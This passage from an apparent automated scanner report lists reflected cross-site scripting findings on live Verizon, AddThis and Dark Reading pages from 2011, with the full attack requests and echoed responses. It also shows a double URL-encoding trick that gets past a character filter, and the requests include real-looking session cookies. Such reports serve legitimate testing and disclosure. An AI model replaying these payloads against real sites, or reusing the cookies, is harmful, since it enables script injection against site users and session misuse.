NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Content-Length: 124879
Expires: Mon, 05 Sep 2011 22:42:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:42:09 GMT
Connection: close

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?fedfb'-alert(1)-'12fea1b1512=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

2.29. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The value of the TabValue request parameter is copied into the HTML document as text between TITLE tags. The payload a5cda</title><script>alert(1)</script>1049536fafe9f8cfa was submitted in the TabValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TVa5cda</title><script>alert(1)</script>1049536fafe9f8cfa&__VIEWSTATE=%2FwEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ%3D&_ctl00_Template_Wrapper_Begin1_HdnPageName=&_ctl00_Template_Wrapper_Begin1_HdnPageTitle=&_ctl00_Template_Wrapper_Begin1_HdnPageUrl=&rdTV=FiOSTV&btnSave=Save HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV
Cache-Control: max-age=0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8770
Expires: Mon, 05 Sep 2011 22:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="info">TVa5cda</title><script>alert(1)</script>1049536fafe9f8cfa Preferences</title>
...[SNIP]...

2.30. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The value of the TabValue request parameter is copied into the HTML document as text between TITLE tags. The payload d5c22</title><script>alert(1)</script>dfb8a62d6cb was submitted in the TabValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TVd5c22</title><script>alert(1)</script>dfb8a62d6cb HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 9701
Expires: Mon, 05 Sep 2011 22:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="info">TVd5c22</title><script>alert(1)</script>dfb8a62d6cb Preferences</title>
...[SNIP]...

2.31. http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/templates/layers/setpreferences_generic.aspx

Issue detail

The value of the TabValue request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 864b1'%3balert(1)//a8a85d2d9972625a was submitted in the TabValue parameter. This input was echoed as 864b1';alert(1)//a8a85d2d9972625a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV864b1'%3balert(1)//a8a85d2d9972625a&__VIEWSTATE=%2FwEPDwUJOTA4NjkzMTc0D2QWAmYPZBYEZg8WAh4HVmlzaWJsZWgWAgIBDxBkZBYAZAICDxYCHwBoZGQ%3D&_ctl00_Template_Wrapper_Begin1_HdnPageName=&_ctl00_Template_Wrapper_Begin1_HdnPageTitle=&_ctl00_Template_Wrapper_Begin1_HdnPageUrl=&rdTV=FiOSTV&btnSave=Save HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx?TabValue=TV
Cache-Control: max-age=0
Origin: http://www22.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 8694
Expires: Mon, 05 Sep 2011 22:24:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title class="inf
...[SNIP]...
<script>closepreferenceswindow('tv864b1';alert(1)//a8a85d2d9972625a','','1') </script>
...[SNIP]...

2.32. https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://collaborateext.verizon.com
Path:	/aims/encore/VZCTC.serv

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aa86"><script>alert(1)</script>0ad1c3f3b74 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /aims/encore/VZCTC.serv?appid=141&Source%20Title=Sign%20In&Source%20URL=https%3A//signin.verizon.com/sso/ResetAccount%3FgoFlow%3DresetAccount%23&lob=&initQ=Forgot%20User%20Credentials HTTP/1.1
Host: collaborateext.verizon.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=8aa86"><script>alert(1)</script>0ad1c3f3b74
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 05 Sep 2011 22:26:53 GMT
Content-length: 2584
Content-type: text/html; charset=ISO-8859-1
P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM'
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<title>Your automated customer
...[SNIP]...
<input name="referer" id="referer" type="hidden" value="http://www.google.com/search?hl=en&q=8aa86"><script>alert(1)</script>0ad1c3f3b74"/>
...[SNIP]...

2.33. http://search.verizon.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d48e"-alert(1)-"9e05ad6cd4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?tp=l&rv=l&q=xss&search.x=0&search.y=0 HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9d48e"-alert(1)-"9e05ad6cd4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; hbxRet=Y; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss%20sq~~~~

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:56 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 50718

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
ev1.keywords="xss"; // Keyword
ev1.results="0"; // Number of results
ev1.attr1="l"; // Used for Attribute 1 Large Business template
ev1.attr2="_hbxStrip('http://www.google.com/search?hl=en&q=9d48e"-alert(1)-"9e05ad6cd4')";
ev1.attr3=""; // Used for Attribute 3
ev1.attr4=""; // Used for Attribute 4

//END EDITABLE SECTION

//REQUIRED SECTION. CHANGE "YOURSERVER" TO VALID LOCATION ON YOUR WEB
...[SNIP]...

2.34. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ac704%253cscript%253ealert%25281%2529%253c%252fscript%253e76327e8fb9c was submitted in the Referer HTTP header. This input was echoed as ac704<script>alert(1)</script>76327e8fb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac704%253cscript%253ealert%25281%2529%253c%252fscript%253e76327e8fb9c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93416

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<h4>ac704<script>alert(1)</script>76327e8fb9c - 1 search</h4>
...[SNIP]...

2.35. http://www.addthis.com/bookmark.php [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d308%2522%253balert%25281%2529%252f%252fc3e59b6da98 was submitted in the Referer HTTP header. This input was echoed as 7d308";alert(1)//c3e59b6da98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7d308%2522%253balert%25281%2529%252f%252fc3e59b6da98

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93336

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=7d308%2522%253balert%25281%2529%252f%252fc3e59b6da98";addthis_title="7d308";alert(1)//c3e59b6da98 - 1 search";
var services = { 'facebook_comment':"Facebook Comment", 'facebook_uncomment':"Facebook Uncomment", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com"
...[SNIP]...

2.36. http://www.darkreading.com/security/attacks/showArticle.jhtml [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.darkreading.com
Path:	/security/attacks/showArticle.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16cda"-alert(1)-"07a09eb662a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /security/attacks/showArticle.jhtml HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16cda"-alert(1)-"07a09eb662a
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=aHFlcnBxYTE5ZmU2aGVmdmF0OWFxM25vYzE%3D; expires=Mon, 05-Sep-2011 12:36:26 GMT; path=/
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 47313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title> - Dark R
...[SNIP]...
hannel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="attacks";
s.prop6="";
s.prop7="";
s.prop8="50.23.123.106 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)16cda"-alert(1)-"07a09eb662a";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
...[SNIP]...

2.37. http://search.verizon.com/ [vsrecentsearches cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The value of the vsrecentsearches cookie is copied into the HTML document as plain text between tags. The payload 92222<script>alert(1)</script>b03d1d885ac was submitted in the vsrecentsearches cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

